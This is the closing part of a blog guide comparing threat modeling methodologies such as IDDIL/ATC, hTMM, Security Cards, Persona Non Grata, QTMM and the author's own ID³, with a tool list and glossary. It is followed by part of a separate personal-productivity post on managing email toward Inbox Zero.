Assessment & Triage: Produce a business / mission-prioritized list of findings based on the evaluations of threats (conducted in the first step of this phase). A risk assessment model may be beneficial to help with the analysis & assessment from this and the previous step.
Controls: Select and implement security controls to prevent/mitigate threats. A simple control taxonomy that IDDIL/ATC presents is - inventory, collect, detect, protect, manage and respond.
- To further understand the tools and practices employed to identify and implement controls as part of IDDIL/ATC, reference the following section.

IDDIL/ATC Controls Implementation

IDDIL/ATC includes a number of tools and practices, purpose-built to facilitate the selection, implementation and evaluation of security controls and their effectiveness (further detailed below). ²⁴

Functional Controls Hierarchy (FCH) - The controls column in the threat categorization model chosen earlier corresponds to the portfolio of categorical controls located within the FCH. Alongside these controls is the high-level control function and the tools / capabilities an organization has implemented that possesses that security property (implementation). A sample record within an FCH is provided below.

Function	Category	Implementation	Effectiveness **
Detect	Endpoint Signature	Anti-Virus	Partial

A benefit of constructing and maintaining an FCH is the identification of duplicate controls within your organization.
** The “Effectiveness” field is reserved for the following, controls effectiveness matrix.

Controls Effectiveness Matrix - An extension of the FCH, this matrix adds the “Effectiveness” field which captures the analysis of how effective a control is, mapped to a specific threat / attack vector within an organization.
- Effectiveness is recorded as “full”, “partial”, “none” or “complete control gap”, whereby the final rating is reserved for situations where nothing exists within the matrix (and thus within the organization) for a particular control category.
Controls Effectiveness Scorecard - Provides a “dashboard”-like view of enterprise controls effectivness coverage where high-level control categories (e.g. detect, protect, etc…) are mapped to identified attack surface components (e.g. User, Network, OS, Storage, etc…). A scorecard is created for each identified attack use-case. This is depicted below.

Architectural Rendering - Combined, the previous tools can be collectively used as inputs into the devlopment of a controls-laden architectural rendering. This diagram resembles a flow diagram whereby we map the relationship between attack surface entities, directional data flows and overlays where controls and attacks apply within the architectural visualization. Though not an exact replication of an architectural rendering, this threat model DFD from Synopsys is a similar representation, depicting components/assets, threats and controls, all in one visualization.

Thoughts and Other Tid-Bits for IDDIL/ATC

Below I provide a few final parting thoughts and observations related to the IDDIL/ATC threat modeling methodology.

IDDIL/ATC preaches a focus on practical and scalable integration within a standard engineering lifecycle while at the same time requesting the assessor manually build and maintain a series of controls matrices, potentially lengthy lists of threats/attack scenarios and generally produce a lot of documentation. Without a clear way to automate some of these steps (which this methodology does not cover), I don’t see this as being a particularly scalable methodology.
An even heavier focus with this methodology is in leveraging threat data, threat categorization models (e.g. STRIDE, STRIDE-LM, Cyber Kill Chain) and other threat-focused tools (i.e. attack trees) to better determine risk and where effort should be spent. This quality of IDDIL/ATC is where it shines in my opinion. I too believe that by taking a truly threat-focused approach to security, an organization can more effectively mitigate risk.
STRIDE-LM is a new concept for me. It’s just the normal STRIDE we all know and love but also includes “LM” which stands for lateral movement. The added desired security property is therefore segmentation / least-privilege. A worthy edition to STRIDE to say the least…
Despite this methodology not being as “scalable” as the authors may suggest, I truly like this model and am surprised it has not been popularized more. It introduces valuable and novel concepts such as threat profiles, the FCH, controls scorecard and the architectural rendering. All of which I think could be valuable to produce as part of an ongoing internal threat modeling function.
I wanted to make a quick note on the difference between a DFD produced early-on in the threat modeling lifecycle and the “architectural rendering” that this model introduces in the final phase. I think they are very similar in nature and if anything the latter just contains additional context and layers for the identified threats and controls juxtaposed inline with the assets / components from the original model. Keep in mind, a DFD will only contain assets, components and data flows - not the controls and threat information that gets developed in subsequent steps/phases within this and other similar threat modeling methodologies.

Hybrid Threat Modeling Method (hTMM)

The Hybrid Threat Modeling Method (hTMM) is an approach to threat modeling, published by Carnegie Mellon’s Software Engineering Institute in 2018, that combines features from the following models - STRIDE, Security Cards and Persona non Grata. At a high level, hTMM consists of 5 distinct steps, further described below. ²⁵

Step 1: Identify the target system. hTMM recommends leveraging steps 1-3 of SQUARE to divine business/security goals, assets and system artifacts.
Step 2: Brainstorm potential threats and attack vectors using Security Cards. Conduct this exercise with developers, system users and cybersecurity staff.
Step 3: Using the output from the Security Cards exercise, filter attack vectors/scenarios based on realistic personas.
Step 4: For each identified threat, summarize the finding with the following attributes - actor, purpose, target, action, result of action, impact and threat type (i.e. STRIDE).
Step 5: Conduct a formal risk assessment.

Thoughts and Observations for hTMM

In this section, I briefly cover a few thoughts and observations after learning more about the hTMM methodology. ²⁵

The primary foundations of hTMM are all threat-related - threat categorization using STRIDE and threat generation using PnG + Security Cards. This is an unsurprising theme amongst most documented threat modeling methodologies. Follow the threats!
hTMM emphasizes the importance of early specification of security requirements, as this will have measurable impact for the security of the system architecture later on in the system lifecycle.
Unfortunately, the authors continue to proliferate an incorrect understanding that STRIDE is a theat modeling method (a.k.a. “TMM”), when in fact it is simply a threat categorization tool.
No explicit direction is given to create a data flow diagram. Interesting to not build a “model” in a “threat modeling” methodology!
At various points, the authors suggest the use of “tool support” to facilitate the summarization and analysis of threat findings. At no point though do they really explain what these tools are or offer one of their own. For the record, this guide introduces a wealth of threat modeling tools.
Overall, hTMM is pretty barebones and leaves a lot to be interpreted. Its inclusion of Security Cards and PnG is admittedly useful, but not something that is exclusive to this methodology.

Security Cards

Security Cards is a threat generation (or “Threat Brainstorming”, as the authors have referred to it) toolkit, originating from the University of Washington, consisting of 42 distinct “threat” cards across 4 unique “suits” (detailed below). ²⁵^,²⁷

Human Impact - Describes the impacts that actual humans may experience as a result of a successful attack.
Adversary Motivations - Effectively, the “intent” characteristic of a cyber threat.
Adversary Resources - As introduced by the Diamond Model in the CTI section, this represents an adversary’s available infrastructure used to facilitate an attack.
Adversary Methods - Consider these the capabilities or TTPs an attacker leverages to conduct an attack.

So how are these cards used? Well, the official site for Security Cards provides a number of activities that can be exercised, all in the spirit of threat generation. In the absence of having a large, dedicated security function who has time to allocate appropriate resources to conduct threat modeling, Security Cards serves an alternative way to harness the creativity and brainstorming power of non-security personnel to perform threat generation and modeling instead. This can be particularly effective as you are able to introduce new, wide-ranging perspectives into the threat generation process.

Persona Non Grata (PnG)

Persona Non Grata (PnG) is a threat generation technique posited by Jane Cleland-Huang during her time as a software engineering professor at DePaul University (~2014). She suggested that we describe potential threat actors as archetypical users of a system that may have mischievous or even explicitly malicious end-goals. By visualizing and describing these personas, the real-world motivations and possible misuse cases (QTMM: Stage 3) of these unwelcome individuals could be developed, which would then help illuminate potential attack vectors and vulnerabilities. ²⁹

The PnG exercise is useful as it gives anyone involved in the development, or securing of a system, the opportunity to think critically about the types of actors that may target a system, the specific goals they may wish to achieve and the actions they would take to achieve those goals. In the absence of reliable threat intelligence, PnG can be a useful mechanism for producing more realistic attack scenarios compared to something like Trike’s threat generation approach which is to enumerate ALL abuse cases, no matter how realistic. An example persona is described below. ²⁵

Example PnG Threat Persona

“John” is a senior developer within your company. He has been with the company for almost 10 years and has been unhappy with recent changes within the engineering organization. His work velocity has notably slowed in recent weeks and has become more visibly disgruntled as a result of recent encounters with new leadership and having received less meaning project assignments.

Some misuse cases given Johns persona are as follows…

Baking a logic bomb into enterprise code or systems.

Purposefully injecting other forms of malicious code into a production branch.

Taking secrets to a competitor.

Introducing sloppy code as a result of sheer disinterest.

Selling access to corporate infrastructure to an initial access broker.

The goals for John could be the following…

“Get back” at leadership who he disagrees with or those he feels have “wronged him”.

Leave the organization and take trade secrets, data or other assets to a competitor.

Make money by selling data, secrets or access to the organizations infrastructure.

As a skilled developer, John’s capabilities include…

Strong development and technical prowess.

Privileged access to source code repositories, production systems and highly-classified data.

Deep institutional knowledge.

One of few individuals within the company who understand how certain systems operate and their architecture.

Quantitative Threat Modeling (QTMM)

A Quantitative Threat Modeling Methodology (QTMM) can be described as a threat modeling methodology that leverages the measurable characteristics of attack tree elements to quantitatively calculate and prioritize the impact and risk of threats to a system. Such a methodology was published by German researchers from the Technische Universitat Darmstadt and Goethe Universitat Frankfurt am Main universities, titled “Privacy-by-Design Based on Quantitative Threat Modeling”. This research debuts a privacy-focused variant of quantitative threat modeling and introduces the following novel features. ²⁶

A quantitative methodology designed to systematically elicit both security and privacy requirements, by iteratively tuning the risk associated with identified threats and attacks.
A comprehensive set of quantifiable security and privacy (a.k.a. “S&P”) threats based on the “Privacy Protection Goals” (PPGs), which have proved well-suited for qualitatively evaluating risks.
A set of rules to quantitatively aggregate into an attack tree the risks associated with individual attacks.

The Stages of QTMM

QTMM as described by this research is comprised of a 5-stage process which combines STRIDE, PPG and quantifiable attack trees to deliver privacy-by-design (“PbD”) within the early phases of the SDL. These stages are depicted below. ²⁶

Stage 1: Define the DFD - Produce a standard data flow diagram (DFD) of the system.
Stage 2: Map DFD to S&P Threats - Map threats to the various elements (e.g. data store, data flow, process, entity) of the created model - for example, by leveraging STRIDE. In addition to the traditional security-related threats, QTMM also presents privacy-specific threats that should also be accommodated within the matrix. An example of such a mapping is provided below.

Security Property	Threat	Explanation	DS	DF	P	E
Confidentiality	Information Disclosure	…	X		X	X
…	…	…	X	X	X	X

Stage 3: Identify Misuse Cases - Misuse cases are documented by capturing the following information - summary / threat description, target asset, misactor description, attack tree, attack preconditions and mitigation mechanisms. This is done in similar fashion to the LINDDUN methodology, which also suggests the formulation of attack trees to visualize these threats.
Stage 4: Risk-Based Quantification of Attack Trees - This stage represents the essence of QTMM, the goal of which is to provide a quantitative score for a threat tree based on the aggregate score of its collective attack paths. This particular methodology recommends the use of DREAD to quantitatively score and then prioritize attacks within the tree. For more details on the formulas for performing these calculations, I recommend referencing Section II:D (i.e., Stage 4: Risk-based Quantification of Attack Trees) of the QTMM research paper.
Stage 5: Produce S&P Requirements - Elicit mitigation controls and security requirements to mitigate identified risks. Refine attack trees by re-calculating the risk score given the implementation of the proposed countermeasure. Add new attack paths (as applicable) if the introduction of a security control results in new attack surface.

Privacy Protection Goals (PPGs)

Privacy Protection Goals (“PPGs”) are the basic set of security properties derived from the EU Data Protection Directive (Directive 95/46/EC). They resemble the LINDDUN threat categories. The PPGs are defined below. ²⁶

Unlinkability: Data processing is conducted such that privacy-relevant data is unlinkable to any other set of privacy-relevant data outside of the domain, or at least that the implementation of such linking would require disproportionate efforts for the entity establishing such linkage.
Transparency: All parties involved in any privacy-relevant data processing can comprehend the legal, technical and organizational conditions.
Intervenability: The parties involved in any privacy-relevant data processing, including the individual whose personal data is being processed, have the capability to intervene, where necessary.

Thoughts on this Version of a QTMM

Below I provide a list of thoughts and observations related to the quantitative threat modeling methodology (QTMM) presented here.

Great idea to consider both security and privacy threats while performing threat modeling. How novel!
“How can we make threat modeling more fun?”. MATH!
QTMM suggests the use of the SeaMonster security modeling tool to assist with attack trees and misuse case modeling.
Its reliance on a notably flawed model like DREAD is worrisome. That said, swapping DREAD out for a more worthy risk scoring model could take QTMM to the next level. ²⁸

ID³

ID³ is a new(ish) threat modeling methodology created by yours truly. So what does ID³ bring to the table that other, more established methodologies don’t? Nothing really, I just thought it would be cool to come up with my own methodology and give it a cool acronym (and I think I succeeded). Jokes aside, this is in fact the threat modeling recipe I personally use, with influences from some of the other methodologies that have been presented here in this guide. What ID³ brings to the table is a repeatable, scalable methodology that incorporates exactly the elements most useful for my threat modeling style. The high-level steps (and noted influences) for ID³ are presented below.

Inventory System Components - Define the technical scope by building a system component inventory. This ends up being a mix of PASTA Stage 2, Phase 2: Process 5 of OCTAVE and OWASP TMP Step 1 (just the component-ID’ing step). ⁶^,¹³^,²²
Diagram Architecture - Model the system, creating a DFD for visualization. Here I’m going with the equivalent of Microsoft’s “Diagram” step, or Trike’s Implementation Model, scratching the laborious use flow generation and holding the security control decomposition until Step 4. This also takes on the “Visual” quality of VAST. ³^,¹⁴^,¹⁷
Identify Threats - Develop a list of realistic threats using a CTI-infused version of Steps 4 + 5 of the IDDIL/ATC Discovery Phase (threat profiles & attack trees optional). I also make sure to include privacy-related threats ala LINDDUN. ¹⁵^,²⁴
Decompose Application - With sub-systems, data flows and potential threats identified, I begin to decompose the application, generating a list of applicable security controls (i.e. OWASP ASVS), and then applying them as visual overlays at the points where they have effect(s) within the system architecture. For this, I’m relying on the Trike Implementation Model and Step 3 of NIST’s Data-Centric TMM. ¹⁴^,²¹
- While proposing potential controls, I stay mindful of the negative qualities any given control may have on the system or organization (also per Step 3 of NIST’s Data-Centric TMM). ²¹
- * Note: Steps 3 and 4 could technically be switched here with no meaningful effect on the outcome. If you were to perform step 4 first you might in theory be able to rule out certain threats in the Identify Threats step. By doing this though, you might exclude certain threats without really giving them the proper analysis they deserve in the upcoming step.
Illustrate Threats - Leveraging our known technical scope, application decomposition, available CTI and imported attack libraries, I now build/analyze attack scenarios (from PASTA Stage 4), and then perform attack surface analysis and attack tree mapping (both from PASTA Stage 6). The preferred way to illustrate threats alogside the identified controls and system components is to produce an architectural rendering, per the IDDIL/ATC Controls Implementation Step. Once again, this step adheres to the VAST visual principle. ⁶^,¹⁷^,²⁴
Document Risk - Create a risk-prioritized list of findings based on probabilistic attack scenarios, expected impacts and the understanding of what defensive controls are in place. A simple risk-scoring system such as CVSS may be used here. This step of ID³ is going to most resemble PASTA Stage 7, just with simplified inputs and outputs. I also remember to re-factor the risk of threats based on the proposed countermeasures, similar to what is described in Stage 4 of QTMM. ⁶^,²⁶

So there ya have it! ID³.

Other Methodologies

A list of other threat modeling methodologies that I know about, but won’t be fully covering for one reason or another.

MAESTRO

MAESTRO

For reasons I get into here, I don’t really consider MAESTRO to be a stand-alone threat modeling framework. I do however think MAESTRO introduces a useful attack library.

Future Methodologies

In future updates to this guide, I will be detailing additional methodologies. A list of upcoming models is included below!

Modeling Exercise

* Note: In future updates to this guide, I will provide a step-by-step walkthrough of one or more of the Threat Modeling methodologies from this guide. Stay Tuned!

Conclusion

I had a lot of fun, and learned a great deal while building this guide out. I want to thank all of those involved developing the previous research, blog posts and assorted guidance-from-the-Internet I benefited from while putting this all together. Listed below are a few considerations and final parting thoughts related to threat modeling.

Don’t forget to perform threat modeling early on in the system development lifecycle and then continuously as the system evolves.
Threat modeling can be somewhat of an opaque subject which can make the barrier to entry seem high. I hope with this guide, the steps (whichever you choose to take) become clear and thus the path to threat modeling becomes easier.
Many of the threat modeling methodologies covered in this guide are very prescriptive, formalized or just plain involved. This can be overwhelming to the point where you don’t even bother attempting to threat model because you won’t be able to succeed in a by-the-book approach. Try to focus less on doing every. single. thing. that these methodologies describe and more on what you can do to help better highlight the risks within a system. That’s exactly what I did with ID³! I just cherry-picked the things I liked from different models, smushed them together, slapped a shiny new name on it and went on my merry way. In other words, don’t let perfection be the enemy of good.
Threat modeling is (and should be) highly collaborative. You’re going to need help. Use this time to build relationships across the business, learn in a cross-disciplinary fashion and of course, have fun!
Each of the threat modeling methodologies covered in this doc have a context in which they shine. You may find that at different organizations or at different moments in time within a single organization, one methodology will prove superior to another. What I’m trying to say is, keep a working knowledge of all of them, you never know when you’ll want to use one over another.
“The Enchiridion of Impetus Exemplar”, loosely translated from Latin means “The Manual of Attack Model”. It sounds better in Latin…

Appendices

Data Flow Diagram

Data Flow Diagrams (DFDs) are more art than science, in fact, they are drawings much like art! There is however some science to DFDs, especially in the context of threat modeling. The following key should help you decipher the elements within the DFD I have provided, as well as other DFDs which use this common symbology. ⁴

Rounded Rectangle - External process/entity
Circle - Internal process
Arrow - Directional data flow
Partial Rectangle (parallel horizontal lines) - Data store
Rectangle - External entity (out of our control sphere)
Dotted Line - Trust boundary

The DFD you see below is a (admittedly poor) visualization / model of the shellsharks site.

As I mentioned earlier, this is but one way to create a DFD for a threat modeling exercise. For another take, check out this awesome threat model DFD from Synopsys!

* Note: I’m planning on adding a much better DFD in future developments to this guide - more akin to the Synopsys one. Stay tuned!

Threat Modeling Methodology Matrix (TM³)

* Note: In future updates to this guide, I plan on adding a comprehensive matrix (dubbed, “TM³”), mapping the characteristics & capabilities of all methodologies within this guide. This matrix will be reminiscent of the comparison table sourced from the ThreatModeler site. ¹⁷

Tooling

There are a number of tools built for (or can be used for) threat modeling. Listed below are some of these tools. ¹⁹

Microsoft Threat Modeling Tool - Leverages STRIDE to categorize threats and simplify security conversations.
OWASP Threat Dragon - Supports STRIDE & LINDDUN.
ThreatModeler (commerical)
pytm
Trike
Draw.io - Not specifically a threat modeling tool but can be used to create threat models anyways.
Threagile - Open-source toolkit which enables teams to execute Agile threat modeling.
Cairis
IriusRisk (commerical)
SecuriCAD (commerical)
Tutamantic (commerical)
threatcl - threat modeling configuration language with hcl
Threats Manager Studio
threatspec
Diagrams-as-Code - C4 model, Mermaid, Structurizr, Minigrammer, PlantUML
FORK - SaaS-based Risk-Centric PASTA Threat Modeling tool
Attack Tree Tools: ADTool, AT-AT, Ent, SeaMonster, AttackTree+, SecuriTree, RiskTree, Deciduous
Threat Modelling Workbook
Threat Modeling Naturally Tool

* Note: In future updates, I will post some hands-on walkthroughs / reviews / analysis of some of these tools. Stay tuned!

Terminology

This sections lists some useful terminology used across this guide. ⁶^,²⁰

Abuse Case - Deliberate abuse of a use case in order to produce unintended results.
Access Control Matrix - A table in which each row represents a subject, each column represents an object, and each entry is the set of access rights for that subject to that object.
Asset - Data, physical object or other resource of value.
Attack - An action taken that utilizes one or more vulnerabilities to realize a threat (i.e target + attack vector + threat actor).
Attack Graph - The set of all interconnected attack trees for a system.
Attack Libraries - A library of known attacks (e.g. CAPEC).
Attack Surface - Any logical or physical area that can be obtained, used or attacked by a threat actor.
Attack Tree - A tree of attacks, rooted by a threat, comprised of all the ways that the threat can be realized.
Attack Vector - Point and channel for which attacks travel.
Control - A safeguard or countermeasure prescribed for an information system or an organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements.
Countermeasure - See Control.
Data Flow - A link between two processes or a process and a data store.
Data Flow Diagram - Visually describes the processes, data stores and data flows of a system.
Data Store - Any location where data is persisted in a system.
Enchiridion - Latin for “manual”
External Interactor - A process which is outside the scope of the system.
Impact - Value / measure of damage sustained via an attack.
Impetus Exemplar - Latin for “attack model / pattern”
Mitigation - Something which prevents or reduces the damage of an attack.
OWASP Threat Modeling - Four-question framework from OWASP which resembles the Threat Modeling Manifesto.
Process - Any location where work is done on data in a system.
Process Flow Diagram - A type of flowchart that illustrates the relationships between major components.
Risk - A measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of: (i) the adverse impacts that would arise if the circumstance or event occurs; and (ii) the likelihood of occurrence.
Security Requirements - Requirements levied on an information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.
System - The entire application, as defined by the scope of the threat model or audit.
Threat - A potential occurrence, malicious or otherwise, which might damage or compromise an asset. Also defined as the cross-section of attacker intent, capability and opportunity.
Threat Actor - Adverse caller of use or abuse cases.
Threat Model - See intro to threat modeling.
Threat Tree - see Attack Tree.
Traceability Matrix - A traceability matrix examines a threat agent. ¹⁰
Trust Boundary - Encloses a region where all actions occur at the same level of privilege.
Vulnerability - An unmitigated path of an attack tree from the root node (threat) to a leaf.
Weakness - A security issue in a system.

References

The Science of Inbox Zero

Wed, 27 Jul 2022 02:50:00 -0400

Welcome to Part Two of my Inbox Zero series! In Part One, I introduced the concept of Inbox Zero (specifically, my flavor of it) and enumerated the steps I take to zero-out my inbox day-to-day. In this follow-up, I will cover some of the specific, practical mechanics of how I execute my Inbox Zero playbook. I also provide the scientific basis in which this methodology has a very real, positive psychological effect, improving efficiency, productivity and happiness.

Jump to Section

Practical Mechanics
Email Process(ing) Flow
Psychology
References

*A shoutout to my wife, for which I owe my inspiration for doing this research and writing this post. I’ll convert you one way or another!

Practical Mechanics

In my previous post on Inbox Zero, I introduce a number of concepts and steps for zeroing out an inbox, but notably absent are some of the specifics on how I actually do it. In this section, I cover the tooling, procedures and other variables I use to churn through my email.

In the sections below, I cover a variety of techniques, specifics and examples for steps 3 (Take Action), 4 (Save For Later) and 5/6 (Archive/Delete) of my previously detailed zeroing-out methodology. Steps 1 (Unsubscribe) and 2 (Consume) are pretty simple so I really don’t have anything else of substance to add.

Taking Action

To succeed with Inbox Zero, it is crucial to attack emails with a very action-oriented mindset. Email can not be allowed to live rent-free in your inbox or in your head. If we’re not unsubscribing, easily-consuming, archiving or deleting email right away it’s important to ask ourselves, “what needs to be done to complete this email”. Some techniques I employ are described below…

Augment your inbox with a to-do system: Riding side-saddle to my inbox, I rely on my trusty to-do app to help me remember and prioritize items. Email apps are very ineffective to-do apps ¹ and thus shouldn’t be used as one, but your inbox does generate a lot of to-do’s! Naturally then, it makes sense to create a “to-do” for respective items in your inbox. By doing this, you can move an email out of your main inbox and into an appropriate folder, whether that be the “For Later” folder ² or somewhere else. With a stub for that email now in your to-do app, you can safely have it out of your inbox and take care of it based on your own to-do methodology (more on this later ¹¹).

As an example, let’s say you get an email from your dentist, reminding you to schedule your six-month cleaning. Rather than leaving it in the inbox, I would create an item in my to-do app with a subject such as “schedule 6-month dentist appointment”, then I’d delete the email! If there is information in the email I need to help schedule the appointment, I could instead move the email to the “For Later” folder rather than deleting it. Once I’ve completed the task, I could then go back into that folder and delete it for good.

I personally take this approach to a particular extreme. For emails that require a substantive task to be completed (i.e. not just consuming information), I will often create a to-do, even if I can complete it right away! The very act of creating the to-do and then marking it as complete has a psychologically-positive effect. Checking things off, no matter how small, can help build productive momentum ¹². Just be sure to not overdo it here as creating endless tiny to-dos would certainly introduce counter-productive overhead when done at scale.
Stars and flags: Email systems usually have the concept of starring or flagging an email as a way to denote its relative importance. If you follow the guidance from the previous bullet (creating to-do’s associated with emails and tackling them that way) then you technically don’t really need to utilize stars/flags as you would be taking things out of email and prioritizing them in your to-do system instead. With that said, I still star things in my email app as it does add that extra bit of emphasis and urgency for certain emails that I know I need to get to.
The power of delegation: Delegation is an under-utilized action in the world of people’s personal email (and to-do methodologies in general). There is plenty of email I receive that in order to fully “take action” on it, there is a dependency on someone else.

As an example, I may get an email about picking something up from the store but need to coordinate with my wife on when to go. In this case, the dependency is getting a response from my wife about it. Here I could forward the email to my wife (or text her), suggesting a time for me to go pick it up. Now I can move this email to “For Later” as it doesn’t require any additional action from me. Further, I can create a task in my to-do with a subject such as “pick up the thing from the store”. Here I took decisive action on the email, I progressed the task and most importantly, I got one email closer to Inbox Zero!
Inbox checking frequency: This is entirely up to you and really just depends on your own philosophy around “disconnecting”. With that said, depending on the volume of email you receive, I recommend checking it somewhat frequently in order to be able to process it in smaller chunks. (More on this later.)

Saving for Later

OK, so as we have seen in the previous section, a lot of what “taking action” means in reality is in fact not taking immediate action but rather storing the respective item for action at a later date. There are a few techniques I use for this. You can use one or more of these simultaneously to help stay on top of what you need to do while also keeping that inbox shiny and clean.

The enigmatic “For Later” folder: I put a fair amount of things in my notorious “For Later” folder ² - and for a variety of reasons. One could argue, “why is having a bunch of stuff in a separate For Later folder better than just keeping it in your inbox?” I’ll cover the psychological benefits of this concept later, but let me start with explaining the more mechanical benefits.

It’s undeniable that there is some amount of time required to mentally process/initially-triage emails within your inbox. As you work through your inbox - deleting, archiving, consuming, whatever - you spend some time on each. By leaving an email in your inbox (rather than taking an action that would remove it from your inbox), you open yourself up to having to mentally re-assess that item as it now lies adjacent to a new (or otherwise un-processed) email that actually requires fresh review. Rather than forcing yourself to reassess these emails each and every time you check your inbox, simply move them to the “For Later” folder and then review that folder at a less-frequent cadence (more on this interval below!)
- “For Later” folder checking frequency: OK, so let’s say we are moving things into the “For Later” folder - how often should we then consult this folder? Ultimately, I believe this would vary from person to person and it in some ways depends on the frequency in which someone generally checks their inbox. I check my inbox multiple times daily, but I only check “For Later” every couple of days at most. Here you can immediately see the time savings as I am not needing to review these each and every time I check my inbox! The idea here is to check it at a much less frequent interval. If you find yourself checking it often and generally taking no actions, you can probably check it less frequently! With all this said, there’s an even better way to deal with most “For Later” items. (Check out the next bullet!)
- For Later triggers: Once we start sticking lots of things in “For Later” rather than keeping them in the inbox, we could really benefit from a system that helps us remember to review those items while also not necessitating needless checking of each email in that folder when no action is yet needed. So how do we achieve this? Well, in a few ways!
  - We previously covered creating corresponding to-do tasks for emails in the taking action section. If you are leveraging this technique, you can close out “For Later” email items at the same time you close out to-do items based on your chosen to-do methodology. Sweet!
  - As another example, let’s say you have a “For Later” email for a delivery you are expecting that you want to make sure you receive. In this case, I have a delivery tracking app that monitors the progress of my delivery. Once I receive it, I can archive/delete that email in my “For Later” box.
  - Essentially, the idea behind the majority of “For Later” items is that there should be an external trigger that fires, reminding you to consult the “For Later” box and “close out” or make progress towards closure, of the email item.
- When to take substantive action: How do I decide whether to take substantive action vs setting it aside for later? I don’t think there is a real amount-of-time threshold for how I decide when to deal with things (the “Two Minute Rule” ¹⁰ we will discuss later pegs the threshold at, you guessed it! - 2 minutes). For me, this is more of a, what do I feel like doing right now or what do I have time to do right now question. ¹¹
- Don’t leave things in your inbox you will never get to! This is a simple axiom. Just get rid of it! (or archive somewhere)
- What actually ends up in the “For Later” folder?: This will vary person to person, but for me it’s things like tracking number emails, online order confirmations, future travel artifacts/events (e.g. flight/excursion confirmations), assorted to-do’s (that of course have corresponding records in my to-do app), and really any other item that I know I want to get to eventually but don’t really care when.
When do I leave things in the inbox?: In some cases, I leave things in my inbox rather than moving to the “For Later” folder after triaging. What?? Isn’t that contrary to what I suggested earlier? Kinda, but let me explain… I detailed earlier how items that make their way into the “For Later” folder are typically tied to a to-do or some other external trigger. Well if there is an item that doesn’t have a trigger, or a to-do, and needs to be addressed in relatively short-order, I will sometimes decide to just leave it in my inbox. Alternatively, for items that I want to constantly remind myself of, I leave it in the inbox as my eyes will continually be drawn to it each and every time I check my email.
Snoozing: One feature that a lot of email providers have adopted is “Snooze”. This is a very easy way to move an item for later based on a chosen time-delay. I use this in cases where I know I need to check in on something at a particular date and don’t want to create a to-do for it instead.

Archival vs Deletion

I wanted to provide a quick (list driven, of course) process flow related to steps 5/6 from my high-level zero-out playbook.

Once you’ve taken all non-storage/deletion-related actions on an email, follow the following steps for processing.

Do you need this email? No? Delete. Yes? Go to Step 2.
Do I have an existing folder/label that I can archive this email into? Yes? Put email in that folder. No? Go to Step 3.
Does it make sense to create a new folder for emails of this type? Yes? Create folder, archive email into the new folder. No? Generically archive it rather than deleting it.

The idea behind the final flow of Step 3 is that we can archive things “generically” so that we can search for and find things later. By doing so, we do not introduce unnecessary clutter into another folder/label nor will we necessitate the creation of a new folder/label that will never have much in it. Nice!

Email Process(ing) Flow

To help illustrate the overall process flow of how I process my email, I’ve developed the following diagram.

Psychology

Alright, assuming you read the previous section, you now know WAY more about my e-mail processing workflow than any normal human should. Let’s now get into why managing your email in this way is good for you straight-up emotionally. This section will introduce a variety of semi-isolated topics, associating well and independently researched scientific studies with the relevant qualities of “Inbox Zero”. Buckle up!

If a cluttered ~~desk~~ inbox is a sign of cluttered mind, of what, then, is an organized ~~desk~~ inbox a sign? ³

You may be familiar with Marie Kondo’s KonMari method for organization, the main principle being you keep only those things that “spark joy”. I don’t recommend following this exactly in the context of your email (as there is plenty of email I need that doesn’t quite spark joy) but I think the underlying thought here makes sense. Keep only what you need (or of course, enjoy). For everything else, delete or unsubscribe! In this way, you can transform and then live your (digital) life the way you want.
The second tenant of the KonMari method is to ensure everything has a place to go. In the context of your email, this means for things you do want to keep, make sure they are filed away in an appropriate place. Essentially, this is digital house-keeping. Collectively, this methodology promotes mindfulness, introspection and an eye towards the future. ⁴
A 2011 Princeton study titled “Interactions of Top-Down and Bottom-Up Mechanisms in Human Visual Cortex” ⁵ (inhales) explains how clutter impairs focus, thus making it more difficult to complete tasks efficiently. I won’t regurgitate the rather complex science introduced by the research, but what I can say is that when applied to how one might review/process their email, it would follow that by actively reducing the amount of items in your inbox, you can maintain an environment (one with less overall emails) that is scientifically better suited for efficiency/productivity. In other words, even if you can’t achieve truly 0 emails (effectively, Inbox Zero), the sheer fact that you have very few emails in your inbox promotes a more effective working environment.
A Dutch study from 2017 titled “Impact of cleanliness on the productivity of employees” ⁶ investigates the correlation between cleanliness and productivity. Unsurprisingly, it was found that cleanliness significantly increased perceived productivity and general work satisfaction. This follows with the previously mentioned research ⁵ - having a clean or otherwise organized environment (whatever that may be) fosters productivity and efficiency! Traditional wisdom suggests that having an organized workstation helps promote productivity. Given our reliance on email as a primary means in which we collaborate and work, it makes sense for us to keep our inbox and other respective email folders clean and tidy.
To wrap up the theme of organization & cleanliness and how it applies to email, consider some of the following statistics on Organizing & Time Management gathered by the author of the blog Simply Productive. These stats lay bare the cost of clutter and disorganization.
- One stat describes the amount of time (~150 hours/year) wasted searching for lost information. The National Association of Professional Organizers (NAPO) even claims that on average, we spend one year of our lives looking for lost items. With a properly pruned and sorted email system, you can significantly reduce the time it takes to find things in your email!
- Email is increasing in print volume by 40%! This is why ruthlessly unsubscribing is one of the more powerful tools at your disposal.
- Using proper organization tools can improve time management by almost 40%. Inbox Zero, to-do lists, and all the other tactics described in this series can be certainly be considered as some of these tools.
The benefits of being organized don’t end with increased productivity though, there is also very compelling science which points to its stress-reduction qualities as well!
In one study, titled “No place like home: home tours correlate with daily patterns of mood and cortisol…” ⁷ ( ), the researchers identified a correlation between how individuals described their home, and the severity of depressed mood they experienced. In this experiment, even recounting the general cleanliness/organizational-state of their home proved to be stressful (when the individuals in fact had cluttered homes). What I take away is that people who strive to, and succeed in maintaining an acceptable level of organization/cleanliness will in turn be less stressed! This idea is enforced by a subsequent study, “The dark side of home: Assessing possession ‘clutter’ on subjective well-being” ⁸, which concludes that clutter has a negative impact on the psychological home and subjective well-being. This is due to our inherent need to identify self with our physical environment, of which a messy or cluttered one does not reflect well. Put it all together and one could surmise that messiness in general, whether it be in an inbox or in the home, can introduce unwanted stress.
Saving time - which can be achieved through improved efficiency, has been proven to reduce/prevent stress. ⁹
So we now have the basis for how organization and cleanliness can improve productivity, efficiency and even reduce stress. Let’s talk about how we apply the psychology of task management / GTD ¹¹ in the context of Inbox Zero…
